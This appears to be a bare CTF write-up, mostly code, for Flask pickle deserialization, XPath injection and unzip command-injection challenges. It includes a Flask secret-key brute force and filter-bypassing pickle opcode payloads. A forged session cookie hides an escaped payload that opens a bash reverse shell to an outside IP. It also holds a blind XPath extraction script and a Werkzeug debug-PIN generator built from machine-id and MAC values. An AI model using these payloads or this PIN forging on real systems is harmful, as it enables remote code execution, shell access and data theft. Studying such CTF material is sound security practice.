import base64
import pickle
from flask import Flask, session
import os
import random
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(2).hex()
@app.route('/')
def hello_world():
    if not session.get('user'):
        session['user'] = ''.join(random.choices("admin", k=5))
    return 'Hello {}!'.format(session['user'])
@app.route('/admin')
def admin():
    if session.get('user') != "admin":
        return f"<script>alert('Access Denied');window.location.href='/'</script>"
    else:
        try:
            a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes")
            if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
                raise pickle.UnpicklingError("R i o b is forbidden")
            pickle.loads(base64.b64decode(session.get('ser_data')))
            return "ok"
        except:
            return "error!"
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8888)

numbers_str = [str(x) for x in range(10)]
a=['a','b','c','d','e','f']
a+= numbers_str
file=open("C:/Users/Administrator/Desktop/easypickle/zidian.txt",'w')
for b in a:
    for c in a:
        for d in a:
            for e in a:
                file.write("{}{}{}{}\n".format(b,c,d,e))

flask-unsign --unsign --cookie "eyJ1c2VyIjoiYWRtaW4ifQ.YyVFUA.RSTsbveITHMSD9v0MTLMswCryRc"  --wordlist  "C:\Users\Administrator\Desktop\easypickle\zidian.txt"  --no-literal-eval
[*] Session decodes to: {'user': 'admin'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 24960 attempts
b'6174'

import pickle
import base64
import os
code=b'''(S'shanghe'\nS'shanghe'\nd(S'shanghe'\nS'shanghe'\nd(cos\nsystem\nS'dir'\nos.'''
code=base64.b64encode(code)
print(code)
# pickle.loads(base64.b64decode(code)

C:\Users\Administrator\Desktop\easypickle\venv\Scripts\python.exe C:/Users/Administrator/Desktop/easypickle/3.py 
code=b'''(S'shanghe'\nS'shanghe'\nd(S'shanghe'\nS'shanghe'\nd(cos\nsystem\nS'dir'\nos.'''
    0: (    MARK
    1: S        STRING     'shanghe1'
   12: S        STRING     'shanghe'  #这里的意思是压进去第一个字典
   23: d        DICT       (MARK at 0)
   24: (    MARK
   25: S        STRING     'shanghe2'
   36: S        STRING     'shanghe'
   47: d        DICT       (MARK at 24)  #再往栈里面压进去第二个字典
   48: (    MARK
   49: c        GLOBAL     'os system'
   60: S        STRING     'dir'
   67: o        OBJ        (MARK at 48)  #这里用我们逃出来的o指令进行命令执行
   68: s    SETITEM   #最后s的指令就会把 o指令执行后的内容以及shanghe2的键值对压进去shanghe1的字典里面，作为新的键值对。
   69: .    STOP
highest protocol among opcodes = 1

import pickle
import base64
import os
code=b'''(S'shanghe'\nS'shanghe'\ndS'shanghe'\n(cos\nsystem\nS'cat f* >xxx'os.'''
code=base64.b64encode(code)
print(code)
# pickle.loads(base64.b64decode(code))

python3  flask_session_cookie_manager3.py encode -s "6174"  -t "{'user': 'admin','ser_data':b'KFMnc2hhbmdoZScKUydzaGFuZ2hlJwpkUydzaGFuZ2hlJwooY29zCnN5c3RlbQpWXHUwMDYyXHUwMDYxXHUwMDczXHUwMDY4XHUwMDIwXHUwMDJEXHUwMDYzXHUwMDIwXHUwMDI3XHUwMDczXHUwMDY4XHUwMDIwXHUwMDJEXHUwMDY5XHUwMDIwXHUwMDNFXHUwMDI2XHUwMDIwXHUwMDJGXHUwMDY0XHUwMDY1XHUwMDc2XHUwMDJGXHUwMDc0XHUwMDYzXHUwMDcwXHUwMDJGXHUwMDM0XHUwMDM3XHUwMDJFXHUwMDM5XHUwMDM2XHUwMDJFXHUwMDM0XHUwMDMxXHUwMDJFXHUwMDMxXHUwMDMwXHUwMDMzXHUwMDJGXHUwMDMxXHUwMDMzXHUwMDMzXHUwMDM3XHUwMDIwXHUwMDMwXHUwMDNFXHUwMDI2XHUwMDMxXHUwMDI3Cm9zLg=='}

babyjava

import requests
url = "http://eci-2zeck6h5lu4htf36m573.cloudeci1.ichunqiu.com:8888/hello"
string="abcdefghjklmnopqrstuvwxyz1234567890{}-_"
def getstr():
    result=""
    for j in range(1,50):
        for i in string:
            #payload=f"-1'or substring(name(/*[1]), {j}, 1)='{i}' or '0'='"       #root
            #payload = f"-1'or substring(name(/root/*[1]), {j}, 1)='{i}' or '0'='" #user
            #payload = f"-1'or substring(name(/root/user/*[1]), {j}, 1)='{i}' or '0'='" #username
            payload = f"-1'or substring((//root[position()=1]/user[position()=1]/username[position()=2]),{j},1)='{i}' or '0'='"
            data = {"xpath":payload }
            r=requests.post(url,data=data)
            if "<p>user1</p>" in r.text:
                result+=i
                print(result)
        print("++++++++++++++++++++++++++++")
getstr()

onlineUnzip

题目源代码如下

import os
import re
from hashlib import md5
from flask import Flask, redirect, request, render_template, url_for, make_response
app=Flask(__name__)
def extractFile(filepath):
    extractdir=filepath.split('.')[0]
    if not os.path.exists(extractdir):
        os.makedirs(extractdir)
    os.system(f'unzip -o {filepath} -d {extractdir}')
    return redirect(url_for('display',extractdir=extractdir))
@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')
@app.route('/display', methods=['GET'])
@app.route('/display/', methods=['GET'])
@app.route('/display/<path:extractdir>', methods=['GET'])
def display(extractdir=''):
    if re.search(r"\.\.", extractdir, re.M | re.I) != None:
        return "Hacker?"
    else:
        if not os.path.exists(extractdir):
            return make_response("error", 404)
        else:
            if not os.path.isdir(extractdir):
                f = open(extractdir, 'rb')
                response = make_response(f.read())
                response.headers['Content-Type'] = 'application/octet-stream'
                return response
            else:
                fn = os.listdir(extractdir)
                fn = [".."] + fn
                f = open("templates/template.html")
                x = f.read()
                f.close()
                ret = "<h1>文件列表:</h1><br><hr>"
                for i in fn:
                    tpath = os.path.join('/display', extractdir, i)
                    ret += "<a href='" + tpath + "'>" + i + "</a><br>"
                x = x.replace("HTMLTEXT", ret)
                return x
@app.route('/upload', methods=['GET', 'POST'])
def upload():
    ip = request.remote_addr
    uploadpath = 'uploads/' + md5(ip.encode()).hexdigest()[0:4]
    if not os.path.exists(uploadpath):
        os.makedirs(uploadpath)
    if request.method == 'GET':
        return redirect('/')
    if request.method == 'POST':
        try:
            upFile = request.files['file']
            print(upFile.filename)
            if os.path.splitext(upFile.filename)[-1]=='.zip':
                filepath=f"{uploadpath}/{md5(upFile.filename.encode()).hexdigest()[0:4]}.zip"
                upFile.save(filepath)
                zipDatas = extractFile(filepath)
                return zipDatas
            else:
                return f"{upFile.filename} is not a zip file !"
        except:
            return make_response("error", 404)
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000, debug=True)

https://blog.csdn.net/weixin_54648419/article/details/123632203

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctf'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]
private_bits = [
    '95532922527',#  /sys/class/net/eth0/address 16进制转10进制
    '96cec10d3d9307792745ec3b85c896209361435ac3de86b68f6b5282b8bc57435c57c9096554c72c7f5a5bc591939427'#  /etc/machine-id  拼接上/proc/self/cgroup
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)